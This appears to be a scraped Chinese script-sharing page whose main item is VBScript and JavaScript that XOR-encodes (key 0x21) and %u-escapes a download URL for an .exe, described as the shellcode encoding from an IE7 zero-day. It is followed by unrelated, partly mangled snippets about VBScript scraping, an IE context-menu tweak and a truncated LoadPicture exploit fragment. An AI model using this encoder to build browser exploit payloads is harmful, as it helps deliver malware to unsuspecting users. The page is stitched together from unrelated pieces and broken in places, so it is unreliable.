ie7 0day当中的shellcode的escape+xor21加密
Function Encode(s,n)
Dim b
b=UCase(s)
For i=1 To Len(b)
Encode=Encode&Chrw((Asc(Mid(b,i,1)) Xor n))
Next
End Function
</script>
<script language="javascript">
myrand=window.prompt("url:","http://www.sohu.com/1.exe");
strVariable = (Encode(myrand,0x21)).toUpperCase( )
function gen(url)
{
var i=0,l=0,k=0,curl="";
l= url.length;
for(;i<l;i++){
k=url.charCodeAt(i);
if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}
if (l%2){curl+="00";}else{curl+="0000";}
curl=curl.replace(/(..)(..)/g,"%u$2$1");
return curl;
}
document.write(gen(strVariable));
</script>
VBScript 作用 简单说明
有事没事用VBS采集别人网站上的部分或全部数据进行分析,然后写入数据库或存到文本文件里,有时还会用VBScript做一些移动光标及输入的操作,比如
IE浏览器增加“复制图像地址”的右键菜单的vbs代码
但IE以及与IE共用右键菜单的MyIE、Sogou等浏览器均没有复制图像链接地址的快捷菜单,通常只有选择图片的属性再在属性对话框中复制图片地址,很麻烦
vbscript LoadPicture函数使用方法与漏洞利用
titleLoadPicture函数/titleformname="frm"选择图片inputtype="file"name="pic"onChange="GetPicInfor()"/formscriptlanguage="vbscript"SubGetPicInfor()dimobjpic,iWidth,iHeightdimpictype,picpathpicpath=
标签:地址,图片,右键菜单,函数,属性